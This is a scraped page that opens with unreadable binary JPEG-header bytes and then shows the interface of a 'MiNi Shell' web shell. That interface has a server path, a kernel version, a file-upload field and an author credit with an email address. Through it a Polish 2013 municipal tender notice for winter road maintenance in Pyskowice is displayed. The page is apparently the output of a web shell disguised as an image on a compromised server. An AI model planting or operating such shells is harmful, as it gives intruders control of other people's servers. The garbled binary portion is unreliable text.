JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131009/208819-N-2013.html

<p class="kh_header"><b>Pyskowice: Zimowe utrzymanie dróg w sezonie zimowym 2013/2014 w Gminie Pyskowice</b><br>
<b>Numer ogłoszenia: 208819 - 2013; data zamieszczenia: 09.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pyskowice , ul. Strzelców Bytomskich 3, 44-120 Pyskowice, woj. śląskie, tel. 32 3326000, faks 32 3326002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pyskowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg w sezonie zimowym 2013/2014 w Gminie Pyskowice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

Zimowe utrzymanie dróg w sezonie zimowym 2013/2014 w Gminie Pyskowice
Zakres zamówienia obejmuje:

odśnieżanie  i  przeciwdziałanie  śliskości  na  drogach,
wywóz  nadmiaru  śniegu,
utrzymywanie czystości na drogach w okresie, kiedy nie będzie zalegał śnieg tj. zamiatanie i zbieranie nieczystości, ich wywóz i składowanie.

Odśnieżanie i przeciwdziałanie  śliskości należy rozpocząć bez wezwania ze strony Zamawiającego z chwilą wystąpienia opadów śniegu lub zjawisk, które mogą powodować gołoledź czy inne utrudnienia w ruchu kołowym. Prace powinny  być wykonane tak, aby zachować stałą przejezdność dróg. 
Po  każdym  dniu,  w  którym  przeprowadzona  była  akcja  zimowa,  Zamawiający  otrzyma  potwierdzenie  jej  prowadzenia  wraz  z  dokładnym  zestawieniem  wykazu  dróg  z  podziałem  na  kategorie  oraz  ilością  kilometrów  objętych  zimowym  utrzymaniem  w  danym  dniu. 

Potwierdzenie  prowadzenia  akcji  Wykonawca  zgłosi  w  formie  pisemnej,  faxem  lub  e-mailem  osobie  pełniącej  nadzór  ze  strony  Zamawiającego  najpóźniej  do  godz. 15.00  następnego  dnia  po  dniu,  w  którym  akcję  rozpoczęto  (od  poniedziałku  do  czwartku),  natomiast  za  prowadzenie  akcji  w  piątki,  soboty  i  niedziele,  do  godz.  1500  w  poniedziałek.  
Zamawiający  nie  zapłaci  za  prace,  które  nie  zostały  zgłoszone  zgodnie  z  w/w  wymogami.

Wykonawca zadania we własnym zakresie przygotowuje, gromadzi oraz przechowuje materiały do usuwania śliskości. Wykonawca jest zobowiązany stosować odpowiednie dawki materiałów w zależności od typu spodziewanej śliskości, rodzaju występującej śliskości, warunków atmosferycznych oraz temperatury nawierzchni zgodnie z rozporządzeniem Ministra Środowiska z dnia 27 października 2005 r. w sprawie rodzajów i warunków stosowania środków, jakie mogą być używane na drogach publicznych oraz ulicach i placach (Dz. U. Nr 230, poz. 1960 z 2005 r.)

Łączną  powierzchnię  dróg objętych odśnieżaniem i przeciwdziałaniem śliskości określa załącznik  nr  5  do SIWZ.  Zgodnie  z  przedmiotowym  załącznikiem  wyszczególnione  drogi  i  place  gminne  w  granicach  administracyjnych  Gminy  Pyskowice  podzielone  są  na  I,  II  i  III  standard  zimowego  utrzymania  dróg  określony  w  Zarządzeniu  nr  46  Ministra  Transportu  i  Gospodarki  Morskiej  z  dnia  25  października  1994r.

Utrzymywanie czystości na drogach w okresie, kiedy nie będzie zalegał śnieg będzie wykonywane na pisemne, telefoniczne lub mailowe zgłoszenie Zamawiającego. Utrzymywanie czystości na drogach będzie polegać na usuwaniu zanieczyszczeń z nawierzchni dróg na szerokości 1m wzdłuż krawędzi jezdni po obu stronach wraz z wywozem zebranych odpadów do miejsca unieszkodliwiania odpadów. Wykaz dróg podlegających utrzymaniu w czystości określa załącznik nr 6 do SIWZ. Termin wykonania - 2 dni od otrzymania zgłoszenia.
UWAGA 
1.Wykonawca  zobowiązany jest do dostosowania pracy ludzi i sprzętu do zmieniających  się  warunków  atmosferycznych.
2.Niedopuszczalne jest stosowanie żużla wielkopiecowego oraz paleniskowego jako materiału szorstkiego do  prowadzenia akcji.
3.Prace związane z wywozem nadmiaru śniegu każdorazowo wykonywane będą na odrębne pisemne, telefoniczne lub mailowe zlecenie Zamawiającego. Termin wykonania wynosi 2 dni od otrzymania zlecenia.
4.Do obowiązków Wykonawcy należy stały monitoring stanu nawierzchni dróg i placów  gminnych.
5.Ze  względu  na  nieprzewidywalność  warunków  atmosferycznych  i  charakter  zamówienia  wymagający  bieżących  reakcji  wielkości  podane  w  formularzu  cenowym  w  kolumnie  nr  4  są  wielkościami  szacunkowymi  i  mogą  ulec  zmianie  bez  możliwości  przekroczenia  kwoty  wynagrodzenia  podanej  w  formularzu  cenowym  w  wierszu  nr  10.  Zadanie  zimowego  utrzymania  dróg  będzie  realizowane  do  wyczerpania  środków  finansowych  o  których  mowa  w  formularzu  cenowym  w  wierszu  nr  10  jednak nie dłużej niż do dnia 30.04.2014r..
6.Wynagrodzenie  będzie  wypłacane  za  faktyczne  wykonanie  poszczególnych  usług  wchodzących  w  zakres  przedmiotu  umowy,  wyliczone  na  podstawie  cen  jednostkowych  wynikających  z  oferty  Wykonawcy  oraz  faktycznie  wykonanych  prac.
7.Pierwsza faktura za wykonane prace zostanie wystawiona po 01.01.2014 r., a każda kolejna w miesięcznym okresie fakturowania po zakończeniu każdego miesiąca..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje  udzielenie zamówień uzupełniających określonych  w  art.  67  ust.  1  pkt  6  Ustawy  Prawo  Zamówień  Publicznych, w okresie 3 lat od udzielenia zamówienia, stanowiących nie więcej niż 50% wartości zamówienia  podstawowego i polegającego na powtórzeniu tego samego rodzaju zamówień, zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.91.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie przewiduje szczegółowego opisu spełnienia tego warunku. Warunek
udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp
wymienionego w pkt. VII SIWZ punkt 2.1. w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie
spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy  ubiegający  się  o  zamówienie  muszą  wykazać  wykonanie w ciągu ostatnich trzech lat przynajmniej 1 usługę polegającą na zimowym utrzymaniu dróg ,  a  w  przypadku  świadczeń  okresowych  lub  ciągłych  wykonywanie  jednej  usługi  w  zakresie  niezbędnym  do  wykazania  spełnienia  warunków  wiedzy  i  doświadczenia  o  wartości  nie  mniejszej  niż  150.000,00 zł  brutto.

Warunek udziału w postępowaniu będzie oceniany na
podstawie dokumentów i oświadczeń wymienionych w pkt. VII SIWZ punkt 2.1. i 2.2 w systemie 0-1
(zero jedynkowym) wg formuły spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy  ubiegający  się  o  zamówienie  muszą wykazać dysponowanie ( dysponują / będą dysponować) odpowiednim sprzętem do wykonywania przedmiotu umowy tj. minimum:
piaskarka	-  2 szt
pług śnieżny -  2 szt
samochód samowyładowczy 5 t. lub ciągnik z przyczepą -  1 szt.


Warunek udziału w postępowaniu będzie oceniany na
podstawie dokumentów i oświadczeń wymienionych w pkt. VII SIWZ punkt 2.1. i 2.3 w systemie 0-1
(zero jedynkowym) wg formuły spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie przewiduje szczegółowego opisu spełnienia tego warunku. Warunek
udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp
wymienionego w pkt. VII SIWZ punkt 2.1. w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie
spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający nie przewiduje szczegółowego opisu spełnienia tego warunku. Warunek
udziału w postępowaniu będzie oceniany na podstawie oświadczenia art. 22 ust. 1 ustawy Pzp
wymienionego w pkt. VII SIWZ punkt 2.1. w systemie 0-1 (zero jedynkowym) wg formuły spełnia / nie
spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zgodnie z §1 ust. 4 Rozporządzenia Prezesa Rady Ministrów z dni 19 luty 2013r. w sprawie rodzajów dokumentów jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane, zamawiający określa główne usługi, których dotyczy obowiązek wskazania przez wykonawcę w wykazie

Pod pojęciem głównych usług Zamawiający rozumie usługi polegające na zimowym utrzymaniu dróg w zakresie i ilości niezbędnej do wykazania spełniania warunku wiedzy i doświadczenia opisanych w rozdziale VI pkt 1.2.

W przypadku wykonywania i niezakończenia jeszcze usługi Wykonawca zobowiązany jest podać na jaką wartość do momentu upływu terminu składania ofert, umowa została wykonana. Wartość ta będzie brana pod uwagę do oceny spełniania warunku. 

Dowodami na potwierdzenie, że usługi zostały wykonane lub są wykonywane należycie są: 
1.poświadczenia, 
2.oświadczenia wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczeń, o których mowa powyżej.

W przypadku gdy zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie, o którym mowa, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, potwierdzających czy usługi zostały wykonane należycie. 
Zgodnie z § 9 ust. 4 Rozporządzenie Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane w postępowaniach o udzielenie zamówienia publicznego wszczynanych w okresie 12 miesięcy od dnia wejścia w życie niniejszego rozporządzenia, wykonawca, w miejsce poświadczeń, o których mowa w § 1 ust. 2 pkt 1 rozporządzenia, może przedkładać dokumenty potwierdzające należyte wykonanie usług, określone w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>5.1. Oświadczenia, że Wykonawcy:
5.1.1. zapoznali się z treścią SIWZ oraz wszystkimi załącznikami stanowiącymi jej integralną cześć i nie wnoszą do nich zastrzeżeń,
5.1.2. w przypadku przyznania im zamówienia, zobowiązują się do zawarcia umowy w miejscu i terminie wskazanym przez zamawiającego na warunkach określonych we wzorze umowy stanowiącym załącznik nr 10 do SIWZ,
5.1.3. uważają się za związanych niniejsza ofertą na czas wskazany w SIWZ tj. 30 dni od daty otwarcia ofert,
5.1.4. pod groźbą odpowiedzialności karnej oświadczają, że załączone do oferty dokumenty opisują stan prawny i faktyczny na dzień otwarcia ofert, 
Oświadczenia z punktu 5.1. należy złożyć na formularzu oferty - zgodnie z załącznikiem nr 1 do SIWZ.
5.2. Pełnomocnictwo  ustanowione  do reprezentowania Wykonawcy/ów ubiegającego/cych się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, notarialnie potwierdzonej za zgodność z oryginałem.

UWAGA: Wykonawcy mogą składać wszystkie wykazy, informacje czy oświadczenia także na własnych drukach, pod warunkiem, że będą one opracowane według schematu druków załączonych do niniejszej SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Postanowienia umowy zawarte są w załączniku nr 10 do SIWZ - wzór umowy
2. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści oferty.
1.Zmiany  umowy  wymagają  aneksu  pod  rygorem  nieważności  z  zastrzeżeniem  pkt. b:
a)Zamawiający  przewiduje  istotne  zmiany  postanowień  umowy  w  przypadku  zmiany  przepisów  prawa,  które  mogą  mieć  wpływ  na  realizację  zamówienia.
b)Zmiana  osoby  uprawnionej  do  realizacji  umowy  zarówno  ze  strony  Zamawiającego  jak  i  Wykonawcy  następuje  po  pisemnym  poinformowaniu  drugiej  Strony  i  nie  wymaga  aneksu  do  umowy.
c)W zależności od warunków atmosferycznych końcowy termin realizacji zadania może zostać przedłużony  o  taką  ilość  dni,  w  których  uzasadnione  będzie  prowadzenie  akcji  zimowej.
2.W przypadku wniesienia odwołania, aż do jego rozstrzygnięcia Zamawiający wstrzyma podpisanie umowy.
W przypadku dokonania wyboru najkorzystniejszej oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, przed podpisaniem umowy należy przedłożyć umowę regulującą współpracę tych podmiotów (umowa konsorcjum, umowa spółki cywilnej).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pyskowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Pyskowicach,
ul. Strzelców Bytomskich 3, 44-120 PYSKOWICE, pok 307.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2013 godzina 09:00, miejsce: Urząd Miejski w Pyskowicach, ul. Strzelców Bytomskich 3, 44-120 PYSKOWICE w
Biurze Obsługi Interesanta pok. 107 /parter/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com